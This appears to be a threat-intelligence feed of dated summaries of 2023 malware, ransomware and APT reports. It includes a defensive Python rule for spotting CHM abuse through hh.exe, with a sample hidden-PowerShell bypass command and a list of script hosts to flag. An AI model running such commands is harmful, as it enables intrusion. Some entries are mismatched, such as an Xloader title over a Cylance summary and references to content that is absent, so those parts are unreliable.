- CERT-UA researchers have identified unauthorized access to the information and communication system (ICS) of one of the utility companies. It is observed that the primary compromise of the computer took place on 19.01.2023 as a result of the installation of an unlicensed version of the software product Microsoft Office 2019.
—
- Intel Source:
- PaloAlto
- Intel Name:
- New_Variant_of_Xloader_Malware
- Date of Scan:
- 2023-04-03
- Impact:
- MEDIUM
- Summary:
- Researchers from Palo Alto Networks Unit 42 have identified a new ransomware named Cylance that targets Windows and Linux systems.
Source:
https://twitter.com/Unit42_Intel/status/1641588431221342208
—
- Intel Source:
- ZScaler
- Intel Name:
- Money_Message_Ransomware_Targeting_Worldwide
- Date of Scan:
- 2023-04-03
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have identified a new ransomware gang named ‘Money Message’ that targets victims worldwide and demands million-dollar ransoms in exchange for not leaking data and for releasing a decryptor.
Source:
https://twitter.com/Threatlabz/status/1641113991824158720
—
- Intel Source:
- ASEC
- Intel Name:
- Analyzing_CHM_Malware_Using_EDR
- Date of Scan:
- 2023-04-01
- Impact:
- LOW
- Summary:
- ASEC researchers have identified an APT attack case that recently used a CHM (Compiled HTML Help) file. Because a CHM file bundles HTML content, threat actors can embed malicious script in that HTML; the inserted script executes through hh.exe, the HTML Help application that ships with Windows by default.
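The execution chain described here (and in the Bitter group CHM entries above) gives a defender two reliable process-creation signals: hh.exe opening a .chm that lives outside the locations where vendor help files normally sit, and hh.exe becoming the parent of a scripting or LOLBin host. The detection below is an added example written for this page, not ASEC's EDR logic; the events are constructed records with Sysmon Event ID 1 field names, the allow-listed help-file roots and the list of suspicious child processes are assumed tuning choices, and the filenames and paths are made up (the "Project Plan 2023.chm" name is the lure name quoted in the Bitter entry).

```python
import ntpath
import re

# Constructed process-creation events using Sysmon Event ID 1 field names
# (Image, CommandLine, ParentImage). Sample records, not real telemetry.
EVENTS = [
    # 1. hh.exe opens a CHM from the user's Downloads folder (lure opened from mail client)
    {"Image": r"C:\Windows\hh.exe",
     "CommandLine": r'"C:\Windows\hh.exe" "C:\Users\victim\Downloads\Project Plan 2023.chm"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    # 2. the embedded script in the CHM spawns cmd.exe, which launches PowerShell
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c start /min powershell.exe -w hidden -ep bypass -f C:\Users\Public\s.ps1",
     "ParentImage": r"C:\Windows\hh.exe"},
    # 3. benign: a vendor help file under Program Files
    {"Image": r"C:\Windows\hh.exe",
     "CommandLine": r'"C:\Windows\hh.exe" "C:\Program Files\Vendor App\help\manual.chm"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    # 4. benign: cmd.exe started by the user from Explorer
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# Assumed allow-list: help files shipped with software normally live under these roots.
TRUSTED_CHM_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")

# Assumed list of children that hh.exe has no legitimate reason to spawn.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "msiexec.exe"}

# First .chm argument on the command line, quoted (may contain spaces) or bare.
CHM_ARG_RE = re.compile(r'"([^"]+\.chm)"|(\S+\.chm)', re.IGNORECASE)


def basename(path: str) -> str:
    # ntpath handles Windows separators regardless of the host OS running the detector
    return ntpath.basename(path).lower()


def extract_chm_path(cmdline: str):
    m = CHM_ARG_RE.search(cmdline)
    return (m.group(1) or m.group(2)) if m else None


def chm_is_trusted(path: str) -> bool:
    return path.lower().startswith(TRUSTED_CHM_ROOTS)


def detect_chm_abuse(events: list) -> list:
    """Apply both rules to a list of process-creation events and return alerts."""
    alerts = []
    for ev in events:
        image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
        # Rule 1: hh.exe opening a help file from outside the trusted roots
        if image == "hh.exe":
            chm = extract_chm_path(ev["CommandLine"])
            if chm and not chm_is_trusted(chm):
                alerts.append({"rule": "chm_opened_from_untrusted_path", "chm": chm})
        # Rule 2: hh.exe as parent of a scripting / LOLBin host
        if parent == "hh.exe" and image in SCRIPT_HOSTS:
            alerts.append({"rule": "hh_spawned_script_host", "child": image,
                           "cmdline": ev["CommandLine"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_chm_abuse(EVENTS):
        print(alert)
```

Rule 2 is the higher-fidelity signal: hh.exe rendering help content has no business launching cmd.exe or PowerShell. Rule 1 will need local tuning where software keeps help files under ProgramData or user profiles; extend TRUSTED_CHM_ROOTS rather than disabling it.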
—
- Intel Source:
- ASEC
- Intel Name:
- Emotet_Distributing_via_OneNote
- Date of Scan:
- 2023-04-01
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered Emotet being distributed via OneNote. A spear-phishing email carrying a OneNote attachment prompts the reader to open it; the attachment contains a malicious script file (JS file).
—
- Intel Source:
- TrendMicro
- Intel Name:
- New_OpcJacker_Malware_Distributing_via_Fake_VPN_Malvertising
- Date of Scan:
- 2023-04-01
- Impact:
- LOW
- Summary:
- TrendMicro researchers have discovered a new malware, which they named OpcJacker, that has been distributed in the wild since the second half of 2022. Its main functions include keylogging, taking screenshots, stealing sensitive data from browsers, loading additional modules, and replacing cryptocurrency addresses in the clipboard for hijacking purposes.
—
- Intel Source:
- ASEC
- Intel Name:
- New_Infostealer_LummaC2_Distributing_Under_the_Mask_of_Illegal_Cracks
- Date of Scan:
- 2023-04-01
- Impact:
- LOW
- Summary:
- ASEC researchers have identified a new Infostealer called LummaC2 that is being distributed disguised as illegal programs such as cracks and keygens.
—
- Intel Source:
- Quickheal
- Intel Name:
- The_Deep_Examination_of_Royal_Ransomware
- Date of Scan:
- 2023-04-01
- Impact:
- LOW
- Summary:
- QuickHeal researchers have published a deep-dive analysis of the Royal Ransomware. It was first observed in mid-2022 and encrypts all volumes, including network shared drives.
Source:
https://blogs.quickheal.com/deep-dive-into-royal-ransomware/
—
- Intel Source:
- Splunk
- Intel Name:
- The_Detection_and_Defense_Technique_of_AsyncRAT
- Date of Scan:
- 2023-04-01
- Impact:
- LOW
- Summary:
- Splunk researchers have analyzed AsyncRAT and provided detection and defense techniques. AsyncRAT is a popular commodity malware tool, and threat actors use several interesting script loaders and spear-phishing attachments to deliver it to targeted hosts or networks in different campaigns.
Source:
https://www.splunk.com/en_us/blog/security/asyncrat-crusade-detections-and-defense.html
—
- Intel Source:
- Fortinet
- Intel Name:
- Hackers_Spreading_ShellBot_and_Moobot_Malware_on_Exploitable_Servers
- Date of Scan:
- 2023-03-31
- Impact:
- MEDIUM
- Summary:
- Researchers from FortiGuard Labs have observed several bursts of attacks targeting Cacti and Realtek vulnerabilities in January and March of this year, which then spread ShellBot and Moobot malware.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Phishing_Email_sample_analyses_Mar_4th_to_11th_2023
- Date of Scan:
- 2023-03-31
- Impact:
- LOW
- Summary:
- ASEC lab researchers continuously monitor phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. Their post shares the cases of phishing email distribution during the week from March 5th, 2023 to March 11th, 2023 and provides statistical information on each type.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Malware_statistics_March_13_19th_2023
- Date of Scan:
- 2023-03-31
- Impact:
- LOW
- Summary:
- The ASEC analysis team uses the ASEC automatic analysis system RAPIT to categorize and respond to known malware. Their post covers weekly statistics collected from March 13th, 2023 to March 19th, 2023.
—
- Intel Source:
- Securonix Threat Labs
- Intel Name:
- New_TACTICAL_OCTOPUS_Attack_Campaign_Targeting_US_Entities
- Date of Scan:
- 2023-03-31
- Impact:
- MEDIUM
- Summary:
- Securonix Threat Labs researchers have observed that threat actors are ramping up tax-related phishing scams to US-based victims to infect systems with stealthy malware.
—
- Intel Source:
- Proofpoint
- Intel Name:
- New_APT_Group_TA473_Exploiting_Zimbra_Vulnerability
- Date of Scan:
- 2023-03-31
- Impact:
- MEDIUM
- Summary:
- Researchers from Proofpoint have observed a newly minted advanced persistent threat actor named TA473, exploiting Zimbra vulnerability CVE-2022-27926 to abuse publicly facing Zimbra hosted webmail portals. The goal of this activity is assessed to be gaining access to the emails of military, government, and diplomatic organizations across Europe involved in the Russia-Ukrainian War.
—
- Intel Source:
- Security Intelligence
- Intel Name:
- Defensive_Considerations_for_Lazarus_FudModule
- Date of Scan:
- 2023-03-31
- Impact:
- LOW
- Summary:
- Security Intelligence analysts published a blog post highlighting detection capabilities for the FudModule within the Lazarus sample analyzed by X-Force, as well as a summary of a strategy of using telemetry stream health to detect malware designed to impair defenses through ETW tampering.
—
- Intel Source:
- Sentinelone
- Intel Name:
- AlienFox_Toolkit_Stealing_Cloud_Service_Credentials
- Date of Scan:
- 2023-03-30
- Impact:
- HIGH
- Summary:
- SentinelOne researchers have identified a new modular toolkit called AlienFox which allows threat actors to scan for misconfigured servers to steal authentication secrets and credentials for cloud-based email services.
Source:
https://assets.sentinelone.com/sentinellabs22/s1_-sentinellabs_dis#page=1
—
- Intel Source:
- ASEC
- Intel Name:
- ShellBot_Malware_distribution
- Date of Scan:
- 2023-03-30
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have recently observed the ShellBot malware being installed on Linux SSH servers. ShellBot, aka PerlBot, is a DDoS Bot malware developed in Perl and characteristically uses the IRC protocol to communicate with the C&C server. ShellBot is an old malware that has been in steady use and is still being used today to launch attacks against Linux systems.
Source:
https://asec.ahnlab.com/en/49769/comment-page-2/#comments
—
- Intel Source:
- Sentinelone
- Intel Name:
- Supply_Chain_Attack_on_3CX_Desktop_Apps_Threatens_Millions_at_Risk
- Date of Scan:
- 2023-03-30
- Impact:
- MEDIUM
- Summary:
- Researchers from SentinelOne have identified that the trojanized 3CX desktop app is the first stage in a multi-stage attack chain that pulls ICO files appended with Base64 data from GitHub and ultimately leads to a third-stage info stealer DLL.
—
- Intel Source:
- ASEC
- Intel Name:
- The_distribution_of_a_OneNote_malware_by_Kimsuky
- Date of Scan:
- 2023-03-30
- Impact:
- LOW
- Summary:
- ASEC has observed the distribution of a OneNote malware disguised as a form related to compensation. The confirmed file impersonates the same research center as the LNK-type malware mentioned earlier. Based on the identical malicious activity performed by the VBS files, the team concluded that the same actor, the Kimsuky group, is behind both incidents.
—
- Intel Source:
- ASEC
- Intel Name:
- ChinaZ_DDoS_Bot_malware_distribution
- Date of Scan:
- 2023-03-30
- Impact:
- MEDIUM
- Summary:
- ASEC has observed the ChinaZ DDoS Bot malware being installed on Linux SSH servers. The ChinaZ group, first discovered in 2014, installs various DDoS bots on Windows and Linux systems. Major DDoS bots suspected to have been created by the ChinaZ threat group include XorDDoS, AESDDoS, BillGates, and MrBlack.
—
- Intel Source:
- ASEC
- Intel Name:
- Kimsuky_Group_Leveraging_Alternate_Data_Stream_to_Hide_Malware
- Date of Scan:
- 2023-03-29
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered that the Kimsuky group is using Alternate Data Streams (ADS) to hide their malware. This malware is an Infostealer that collects data by running the VBScript included inside an HTML file. It is characterized by its tendency to hide the actual code among numerous dummy code segments.
—
- Intel Source:
- Mandiant
- Intel Name:
- A_Deep_Dive_into_APT43
- Date of Scan:
- 2023-03-29
- Impact:
- MEDIUM
- Summary:
- Mandiant researchers have assessed with high confidence that APT43 is a moderately-sophisticated cyber operator that supports the interests of the North Korean regime. Campaigns attributed to APT43 include strategic intelligence collection aligned with Pyongyang’s geopolitical interests, credential harvesting, and social engineering to support espionage activities, and financially-motivated cybercrime to fund operations.
Source:
https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report
—
- Intel Source:
- Exatrack
- Intel Name:
- New_Linux_Malware_Linked_With_Chinese_APT_Groups
- Date of Scan:
- 2023-03-29
- Impact:
- MEDIUM
- Summary:
- Exatrack researchers have discovered that an unknown Chinese state-sponsored hacking group has been linked to a novel piece of malware aimed at Linux servers, dubbed Mélofée.
—
- Intel Source:
- Medium
- Intel Name:
- New_Threats_Delivering_Through_NullMixer_Malware
- Date of Scan:
- 2023-03-29
- Impact:
- LOW
- Summary:
- Researchers from Medium have identified that the NullMixer malware operation shows Italy and France to be the favorite European countries from the opportunistic attackers’ perspective. They obtained information and data regarding an ongoing malware operation hitting more than 8,000 targets within a few weeks, with a particular emphasis on North American, Italian, and French targets.
Source:
https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1
—
- Intel Source:
- BitSight
- Intel Name:
- Tofsee_Botnet_Engaging_With_Proxying_and_Mining
- Date of Scan:
- 2023-03-29
- Impact:
- LOW
- Summary:
- Researchers from BitSight have observed a 15-year-old modular spambot called Tofsee being distributed by PrivateLoader (ruzki), a notorious malware distribution service.
Source:
https://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining
—
- Intel Source:
- Intezer
- Intel Name:
- Hackers_From_Bitter_Group_Targeting_Chinese_Nuclear_Energy_Industry
- Date of Scan:
- 2023-03-29
- Impact:
- LOW
- Summary:
- Researchers from Intezer have observed that a cyberespionage hacking group tracked as ‘Bitter APT’ has recently been seen targeting the Chinese nuclear energy industry, using phishing emails to infect devices with malware downloaders.
Source:
https://www.intezer.com/blog/research/phishing-campaign-targets-nuclear-energy-industry/
—
- Intel Source:
- Microsoft
- Intel Name:
- The_Investigation_of_CVE_2023_23397
- Date of Scan:
- 2023-03-28
- Impact:
- HIGH
- Summary:
- Microsoft researchers have provided guidance on steps organizations can take to assess whether users have been targeted or compromised by threat actors exploiting CVE-2023-23397. A successful exploit of this vulnerability can result in unauthorized access to an organization’s environment by triggering a Net-NTLMv2 hash leak.
—
- Intel Source:
- AT&T
- Intel Name:
- BlackGuard_stealer_new_variant
- Date of Scan:
- 2023-03-28
- Impact:
- LOW
- Summary:
- AT&T Alien Labs researchers have observed a new variant of the BlackGuard stealer in the wild, spread via spear-phishing attacks. BlackGuard steals sensitive user information from a wide range of applications and browsers, can hijack crypto wallet addresses copied to the clipboard, and also tries to propagate through removable media and shared devices.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Earth_Preta_Cyberespionage_Campaign_Hits_Over_200
- Date of Scan:
- 2023-03-28
- Impact:
- LOW
- Summary:
- TrendMicro researchers have analyzed the active campaign, delving into the structure, goals, and requirements of the organizations involved, which provided an opportunity to conduct wider intelligence analysis and gain insights for the development of effective countermeasures.
—
- Intel Source:
- Cyble
- Intel Name:
- A_new_Malware_as_a_Service_platform_Cinoshi
- Date of Scan:
- 2023-03-28
- Impact:
- LOW
- Summary:
- Cyble researchers discovered a new Malware-as-a-Service (MaaS) platform, “Cinoshi”. Cinoshi’s arsenal consists of a stealer, botnet, clipper, and cryptominer. This MaaS platform is now offering the stealer and web panel for free, which is rarely seen. The accessibility of these free malware services indicates that attackers no longer need technical expertise or resources to launch cyber-attacks.
Source:
https://blog.cyble.com/2023/03/23/cinoshi-project-and-the-dark-side-of-free-maas/
—
- Intel Source:
- ZScaler
- Intel Name:
- DBatLoader_Targeting_European_Businesses_via_Phishing_Email
- Date of Scan:
- 2023-03-28
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have identified a new campaign involving DBatLoader also known as ModiLoader that specifically targets manufacturing companies and various businesses in European countries via phishing emails.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- The_Hunter_obfuscator_used_by_Magecart_skimmer
- Date of Scan:
- 2023-03-28
- Impact:
- LOW
- Summary:
- Malwarebytes researchers discovered and analyzed a Magecart skimmer that uses Hunter, a PHP JavaScript obfuscator. During their investigation, they observed a number of domains, all part of the same infrastructure, with custom skimmers for several Magento stores.
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2023/03/hunter-skimmer
—
- Intel Source:
- Sentinelone
- Intel Name:
- MacOS_Malware_Targeting_Data_Assets
- Date of Scan:
- 2023-03-27
- Impact:
- LOW
- Summary:
- SentinelOne researchers have examined the data assets targeted by macOS malware in some of the most recent in-the-wild incidents, in order to help defenders better protect the enterprise and hunt for signs of compromise.
—
- Intel Source:
- Proofpoint
- Intel Name:
- New_Era_of_IcedID
- Date of Scan:
- 2023-03-27
- Impact:
- MEDIUM
- Summary:
- Proofpoint researchers have observed three new distinct variants of the malware known as IcedID. Proofpoint calls these variants the “Forked” IcedID, “Lite” IcedID, and Standard IcedID variants. IcedID is a malware originally classified as a banking malware and was first observed in 2017. It also performs as a loader for other malware, including ransomware. There are several key differences between the initial and new variants. One key difference is the removal of banking functionality such as web injects and backconnect. Proofpoint researchers suspect the original operators behind Emotet are using an IcedID variant with different functionality.
—
- Intel Source:
- Trellix
- Intel Name:
- A_new_ransomware_named_Dark_Power
- Date of Scan:
- 2023-03-27
- Impact:
- MEDIUM
- Summary:
- Researchers from Trellix have identified a new ransomware operation named ‘Dark Power’, which has already listed its first victims on a dark web data leak site, threatening to publish the data if a ransom is not paid.
Source:
https://www.trellix.com/en-us/about/newsroom/stories/research/shining-light-on-dark-power.html
—
- Intel Source:
- Uptycs
- Intel Name:
- New_macOS_based_Stealer_MacStealer_Malware
- Date of Scan:
- 2023-03-27
- Impact:
- LOW
- Summary:
- The Uptycs threat research team has observed another macOS stealer, “MacStealer”. The threat actor distributing MacStealer was discovered by the Uptycs threat intelligence team during their dark web hunting. The stealer can extract documents, cookies from a victim’s browser, and login information. It affects Catalina and subsequent macOS versions running on Intel, M1, and M2 CPUs.
Source:
https://www.uptycs.com/blog/macstealer-command-and-control-c2-malware
—
- Intel Source:
- Sentinelone
- Intel Name:
- Chinese_Hackers_Targeting_Middle_East_Telecom_Providers
- Date of Scan:
- 2023-03-25
- Impact:
- LOW
- Summary:
- SentinelLabs researchers have observed the use of a well-maintained, versioned credential theft capability and a new dropper mechanism indicative of an ongoing development effort by a highly-motivated threat actor with specific tasking requirements.
Source:
https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/
—
- Intel Source:
- ASEC
- Intel Name:
- MDS_Evasion_Feature_of_Anti_Sandboxes_That_Use_Pop_up_Windows
- Date of Scan:
- 2023-03-25
- Impact:
- LOW
- Summary:
- ASEC researchers have monitored various anti-sandbox tactics used to evade sandboxes. The post covers a persistent anti-sandbox technique that exploits the button form in malicious IcedID Word files, and the evasion feature of AhnLab’s MDS, which is meant for detecting malicious behavior.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Earth_Preta_Changing_its_TTPs_to_Bypass_Security_Solutions
- Date of Scan:
- 2023-03-25
- Impact:
- LOW
- Summary:
- TrendMicro researchers have discovered Earth Preta delivering lure archives via spear-phishing emails and Google Drive links. After months of investigation, they identified that several undisclosed malware and interesting tools used for exfiltration purposes were used in this campaign.
Source:
https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html
—
- Intel Source:
- Inquest
- Intel Name:
- Exploring_New_Public_Cloud_File_Borne_Phishing_Attack
- Date of Scan:
- 2023-03-25
- Impact:
- LOW
- Summary:
- Researchers from InQuest Labs have analyzed a credential phishing attack discovered by a municipal government organization. The email arrived from a compromised sender account address. The sender organization in the observed samples is the municipality’s county health agency.
—
- Intel Source:
- ASEC
- Intel Name:
- Microsoft_Office_Outlook_Privilege_Escalation_Vulnerability
- Date of Scan:
- 2023-03-25
- Impact:
- HIGH
- Summary:
- Researchers from ASEC have analyzed the Microsoft vulnerability in Outlook for Windows that is being exploited to steal NTLM credentials.
—
- Intel Source:
- Intel471
- Intel Name:
- AresLoader_Linked_With_Russian_APT_Group
- Date of Scan:
- 2023-03-24
- Impact:
- LOW
- Summary:
- Intel471 researchers have observed a new loader malware-as-a-service (MaaS) named AresLoader, offered by threat actors with links to Russian hacktivism, which was recently spotted in the wild.
Source:
https://intel471.com/blog/new-loader-on-the-bloc-aresloader
—
- Intel Source:
- Mandiant
- Intel Name:
- Diving_Deep_into_UNC961
- Date of Scan:
- 2023-03-24
- Impact:
- LOW
- Summary:
- Researchers from Mandiant have detailed the timeline of each intrusion conducted by UNC961, along with detection opportunities and examples of how Managed Defense’s proactive threat hunting, investigation, and response routinely limits the impact on customers’ business and prevents their reality from being desecrated.
Source:
https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated
—
- Intel Source:
- Malwarebytes
- Intel Name:
- New_Kritec_Magecart_Skimmer_Targeting_Magento_Stores
- Date of Scan:
- 2023-03-24
- Impact:
- LOW
- Summary:
- Malwarebytes researchers have identified instances of compromised stores having both skimmers loaded, which means double trouble for victims as their credit card information is stolen not just once but twice.
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2023/03/new-kritec-skimmer
—
- Intel Source:
- Cyble
- Intel Name:
- SideCopy_APT_group_targets_India_government_organization
- Date of Scan:
- 2023-03-23
- Impact:
- LOW
- Summary:
- Recently, Cyble researchers discovered a Twitter post of an ongoing campaign by SideCopy APT against the “Defence Research and Development Organisation” of the Indian government. DRDO is a government agency tasked with researching and developing advanced technologies for use by the Indian Armed Forces.
Source:
https://blog.cyble.com/2023/03/21/notorious-sidecopy-apt-group-sets-sights-on-indias-drdo/
—
- Intel Source:
- Cyfirma
- Intel Name:
- The_New_Ransomware_Named_ALC_Ransomware
- Date of Scan:
- 2023-03-23
- Impact:
- LOW
- Summary:
- CYFIRMA researchers have identified a new strain of malware, named ALC Ransomware, which masquerades as ransomware but is scareware. This malware does not encrypt files on the victim’s machine, but instead disables the task manager, locks the screen, and displays a ransom note.
Source:
https://www.cyfirma.com/outofband/alc-scareware-pretends-to-be-a-ransomware/
—
- Intel Source:
- CISA
- Intel Name:
- A_Detailed_Examination_of_LockBit_From_CISA_and_MS_ISAC
- Date of Scan:
- 2023-03-23
- Impact:
- MEDIUM
- Summary:
- Researchers from CISA and MS-ISAC have issued an advisory warning against the LockBit ransomware. Recommended mitigations include developing a comprehensive restoration plan, employing robust passwords for all accounts, integrating anti-phishing measures, updating software and system versions, and segregating network components, among others.
Source:
https://www.cisa.gov/sites/default/files/2023-03/aa23-075a-stop-ransomware-lockbit.pdf
—
- Intel Source:
- Unit 42
- Intel Name:
- An_Emerging_Ransomware_Strain_Named_Trigona_Ransomware
- Date of Scan:
- 2023-03-23
- Impact:
- LOW
- Summary:
- PaloAlto researchers have identified two new Trigona ransom notes in January 2023 and two in February 2023. Trigona’s ransom notes are unique; rather than the usual text file, they are instead presented in an HTML Application with embedded JavaScript containing unique computer IDs (CID) and victim IDs (VID).
Source:
https://unit42.paloaltonetworks.com/trigona-ransomware-update/
—
- Intel Source:
- Cyble
- Intel Name:
- Emotet_Malware_Spreading_via_OneNote_Attachments_to_Deliver_Payloads
- Date of Scan:
- 2023-03-23
- Impact:
- LOW
- Summary:
- Cyble researchers have closely monitored the Emotet campaign and identified that it is again spreading malicious emails and infecting devices globally after rebuilding its network.
Source:
https://blog.cyble.com/2023/03/17/recent-emotet-spam-campaign-utilizing-new-tactics/
—
- Intel Source:
- Unit42
- Intel Name:
- The_Analysis_of_Hidden_Threats
- Date of Scan:
- 2023-03-23
- Impact:
- LOW
- Summary:
- Researchers from PaloAlto have discussed two important ways they have been able to tailor the analysis environment. Threats are continually evolving, and architecting analysis systems as more of a flexible, nicely abstracted software development kit instead of a stand-alone monolithic application is crucial.
Source:
https://unit42.paloaltonetworks.com/tailoring-sandbox-techniques/
—
- Intel Source:
- CrowdStrike
- Intel Name:
- Microsoft_OneNote_Attachments_used_by_QakBot_eCrime_Campaign
- Date of Scan:
- 2023-03-22
- Impact:
- LOW
- Summary:
- CrowdStrike researchers have observed a QakBot eCrime campaign leveraging Microsoft OneNote attachments for distribution.
Source:
https://www.crowdstrike.com/blog/qakbot-ecrime-campaign-leverages-microsoft-onenote-for-distribution/
—
- Intel Source:
- ZScaler
- Intel Name:
- The_Examination_of_the_Attack_Vectors_of_APT37
- Date of Scan:
- 2023-03-22
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have analyzed the APT37 and found it is a threat actor heavily focused on targeting entities in South Korea. It is constantly updating its tactics, techniques, and procedures as is evident from the multiple file types used in the initial stages by it. The themes used by this threat actor range from geopolitics, current events, and education to finance and insurance.
Source:
https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37
—
- Intel Source:
- Rapid7
- Intel Name:
- Observed_Exploitation_of_Adobe_ColdFusion
- Date of Scan:
- 2023-03-22
- Impact:
- LOW
- Summary:
- Rapid7’s Threat Intelligence team has observed active exploitation of Adobe ColdFusion in multiple customer environments.
Source:
https://www.rapid7.com/blog/post/2023/03/21/etr-rapid7-observed-exploitation-of-adobe-coldfusion/
—
- Intel Source:
- ASEC
- Intel Name:
- New_ShellBot_DDoS_Malware_Targeting_Poorly_Managed_Linux_Servers
- Date of Scan:
- 2023-03-22
- Impact:
- LOW
- Summary:
- ASEC researchers have observed that poorly managed Linux SSH servers are being targeted as part of a new campaign that deploys different variants of malware called ShellBot. ShellBot, also known as PerlBot, is a DDoS Bot malware developed in Perl and characteristically uses IRC protocol to communicate with the C&C server.
—
- Intel Source:
- JFrog
- Intel Name:
- Hackers_targeting_DotNET_Developers_With_Malicious_NuGet_Packages
- Date of Scan:
- 2023-03-21
- Impact:
- LOW
- Summary:
- Researchers from JFrog have identified that threat actors are targeting and infecting .NET developers with cryptocurrency stealers delivered through the NuGet repository and impersonating multiple legitimate packages via typosquatting.
—
- Intel Source:
- Securelist
- Intel Name:
- A_New_APT_Discovered_in_the_Area_of_Russo_Ukrainian_Conflict
- Date of Scan:
- 2023-03-21
- Impact:
- LOW
- Summary:
- Securelist researchers have identified a new APT but have not yet found any direct links between the samples and data used in this campaign and any previously known actors. However, the campaign is still active, and the investigation continues.
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- The_Analysis_of_FudModule_within_the_Lazarus
- Date of Scan:
- 2023-03-21
- Impact:
- LOW
- Summary:
- Researchers from IBM Security Intelligence have analyzed the FudModule within the Lazarus sample, as well as highlighted a strategy of using telemetry stream health as a mode of detecting malware designed to impair defenses through ETW tampering.
Source:
https://securityintelligence.com/posts/defensive-considerations-lazarus-fudmodule/
—
- Intel Source:
- WithSecure
- Intel Name:
- Hackers_From_China_and_Russia_using_SILKLOADER_Malware_to_Avoid_Detection
- Date of Scan:
- 2023-03-20
- Impact:
- LOW
- Summary:
- Researchers from WithSecure Labs have investigated an interesting Cobalt Strike beacon loader that leverages DLL side-loading, which they are tracking as SILKLOADER. Taking a closer look at the loader, they identified several activity clusters leveraging it within both the Russian and Chinese cybercriminal ecosystems.
Source:
https://labs.withsecure.com/content/dam/labs/docs/withsecure-silkloader.pdf
—
- Intel Source:
- Checkpoint
- Intel Name:
- In_depth_Analysis_of_DotRunpeX_Injector
- Date of Scan:
- 2023-03-20
- Impact:
- LOW
- Summary:
- Researchers from Checkpoint have analyzed the dotRunpeX injector and its relation to the older version; their investigation shows that dotRunpeX is used in the wild to deliver numerous known malware families.
—
- Intel Source:
- Uptycs
- Intel Name:
- A_New_InfoStealer_Named_HookSpoofer
- Date of Scan:
- 2023-03-20
- Impact:
- LOW
- Summary:
- Uptycs researchers have discovered a new Infostealer with keylogging and clipper capabilities named HookSpoofer spreading by multiple bundlers. A bundler is a collection of two or more files combined together in a single package.
Source:
https://www.uptycs.com/blog/threat-research-hookspoofer
—
- Intel Source:
- Akamai
- Intel Name:
- Diving_Deep_into_Go_Based_Threat
- Date of Scan:
- 2023-03-20
- Impact:
- LOW
- Summary:
- Researchers from Akamai discovered a new botnet named HinataBot at the start of the year; they caught it on their HTTP and SSH honeypots and observed it exploiting old flaws such as CVE-2014-8361 and CVE-2017-17215.
Source:
https://www.akamai.com/blog/security-research/hinatabot-uncovering-new-golang-ddos-botnet
—
- Intel Source:
- Redacted
- Intel Name:
- BianLian_Ransomware_Gang_Turns_to_Data_Extortion
- Date of Scan:
- 2023-03-20
- Impact:
- LOW
- Summary:
- Redacted researchers have identified that the BianLian ransomware group has shifted its focus from encrypting its victims’ files to only exfiltrating data found on compromised networks and using it for extortion.
Source:
https://redacted.com/blog/bianlian-ransomware-gang-continues-to-evolve/
—
- Intel Source:
- Mandiant
- Intel Name:
- Chinese_Hackers_Suspected_of_Launching_Fortinet_Zero_day_Attacks
- Date of Scan:
- 2023-03-20
- Impact:
- MEDIUM
- Summary:
- Mandiant researchers have discovered that a suspected Chinese hacking group has been linked to a series of attacks on government organizations exploiting a Fortinet zero-day vulnerability (CVE-2022-41328) to deploy malware.
Source:
https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem
—
- Intel Source:
- Sentinelone
- Intel Name:
- The_Investigation_of_Winter_Vivern_APT_Activity
- Date of Scan:
- 2023-03-18
- Impact:
- LOW
- Summary:
- SentinelOne researchers have analyzed Winter Vivern Advanced Persistent Threat (APT) activity, leveraging observations made by the Polish CBZC and Ukraine CERT, and uncovered a previously unknown set of espionage campaigns and targeting activities conducted by this threat actor.
Source:
https://www.sentinelone.com/labs/winter-vivern-uncovering-a-wave-of-global-espionage/
—
- Intel Source:
- G Data Blog
- Intel Name:
- ChatGPT_Rising_Activities_in_Cybercrime_World
- Date of Scan:
- 2023-03-18
- Impact:
- MEDIUM
- Summary:
- Researchers from G DATA have observed that cyberthreat actors capitalize on prominent social events and the latest technology buzzwords to launch their attacks. The curtain raiser for 2023 that made the headlines was the clamor around, and viral use of, a very human-sounding artificial intelligence chatbot named ChatGPT.
Source:
https://www.gdatasoftware.com/blog/2023/03/37716-chatgpt-evil-twin
—
- Intel Source:
- Lab52
- Intel Name:
- APT_C_36_Linked_With_Campaigns
- Date of Scan:
- 2023-03-18
- Impact:
- LOW
- Summary:
- Researchers from Lab52 have observed that the APT-C-36 group has many similarities in terms of tactics, techniques, and procedures (TTPs) with the group Hagga / Aggah.
Source:
https://lab52.io/blog/apt-c-36-from-njrat-to-apt-c-36/
—
- Intel Source:
- Sophos
- Intel Name:
